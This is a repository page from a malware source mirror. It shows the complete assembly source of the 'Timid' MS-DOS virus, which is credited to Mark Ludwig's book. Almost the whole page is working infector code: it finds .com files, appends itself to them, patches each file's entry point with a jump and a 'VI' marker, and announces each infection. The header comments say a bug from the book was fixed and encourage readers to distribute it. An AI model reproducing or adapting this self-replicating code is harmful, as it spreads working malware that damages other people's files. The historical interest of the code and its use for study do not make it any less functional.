ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71de2a7087
MalwareSourceCode/MSDOS/T-Index/Virus.MSDOS.Unknown.timid.asm
vxunderground 4b9382ddbc re-organize 
push
2022-08-21 04:07:57 -05:00

196 lines
3.9 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;TIMID VIRUS asm by Mark Ludwig in 1991.
;
;-infects .coms only in current directory unless called by dos path statement
;-announces each file infected.
;297bytes=eff. length
;Copied from Mark Ludwig's "The Little Black Book of Computer Viruses"
;Slightly modified for A86 assembly.
;-asm makes a 64k file, run against 'bait' .com to get 297 byte virus
;-fixed bug in code reprinted in his book.
;all infected files will have VI at byte position 4-5.
;Mark Ludwig claims copyright on this virus and said he will
; sue anyone distributing his viruses around. I say have fun!.
main segment byte
assume cs:main, ds:main, ss:nothing
org 100h
host:
jmp near ptr virus_start
db 'VI' ;identifies virus
mov ah, 4ch
mov al, 0
int 21h
virus:
comfile db '*.com',0
virus_start:
call get_start
get_start:
sub word ptr [vir_start], offset get_start - offset virus
mov dx, offset dta
mov ah, 1ah
int 21h
call find_file
jnz exit_virus
call infect
mov dx, offset fname
mov [handle] b,24h
mov ah, 9
int 21h
exit_virus: ;bug was here in book
mov dx, 80h
mov ah, 1ah
int 21h
mov bx, [vir_start]
mov ax, word ptr [bx+(offset start_code)-(offset virus)]
mov word ptr [host], ax
mov ax, word ptr [bx+(offset start_code)-(offset virus)+2]
mov word ptr [host+2],ax
mov al, byte ptr [bx+(offset start_code)-(offset virus)+4]
mov byte ptr [host+4], al
mov [vir_start], 100h
ret
start_code:
nop
nop
nop
nop
nop
find_file:
mov dx, [vir_start]
add dx, offset comfile-offset virus
mov cx, 3fh
mov ah, 4eh
int 21h
ff_loop:
or al,al
jnz ff_done
call file_ok
jz ff_done
mov ah, 4fh
int 21h
jmp ff_loop
ff_done:
ret
file_ok:
mov dx, offset fname
mov ax, 3d02h
int 21h
jc fok_nzend
mov bx, ax
push bx
mov cx, 5
mov dx, offset start_image
mov ah, 3fh
int 21h
pop bx
mov ah, 3eh
int 21h
mov ax, word ptr [fsize]
add ax, offset endvirus - offset virus
jc fok_nzend
cmp byte ptr [start_image], 0e9h
jnz fok_zend
fok_nzend:
mov al, 1
or al,al
ret
fok_zend:
xor al,al
ret
infect:
mov dx, offset fname
mov ax, 3d02h
int 21h
mov word ptr [handle],ax
xor cx,cx
mov dx,cx
mov bx, word ptr [handle]
mov ax, 4202h
int 21h
mov cx, offset final -offset virus
mov dx, [vir_start]
mov bx, word ptr [handle]
mov ah, 40h
int 21h
xor cx,cx
mov dx, word ptr [fsize]
add dx, offset start_code-offset virus
mov bx, word ptr [handle]
mov ax, 4200h
int 21h
mov cx, 5
mov bx, word ptr [handle]
mov dx, offset start_image
mov ah, 40h
int 21h
xor cx,cx
mov dx,cx
mov bx, word ptr [handle]
mov ax, 4200h
int 21h
mov bx, [vir_start]
mov byte ptr [start_image], 0e9h
mov ax, word ptr [fsize]
add ax, offset virus_start-offset virus-3
mov word ptr [start_image+1], ax
mov word ptr [start_image+3], 4956h
mov cx, 5
mov dx, offset start_image
mov bx, word ptr [handle]
mov ah, 40h
int 21h
mov bx, word ptr [handle]
mov ah, 3eh
int 21h
ret
final:
;data area
endvirus equ $ + 212
org 0ff2ah
dta db 1ah dup (?)
fsize dw 0,0
fname db 13 dup (?)
handle dw 0
start_image db 0,0,0,0,0
vstack dw 50h dup (?)
vir_start dw (?)
main ends
end host
;end of timid.asm
Reference in New Issue View Git Blame Copy Permalink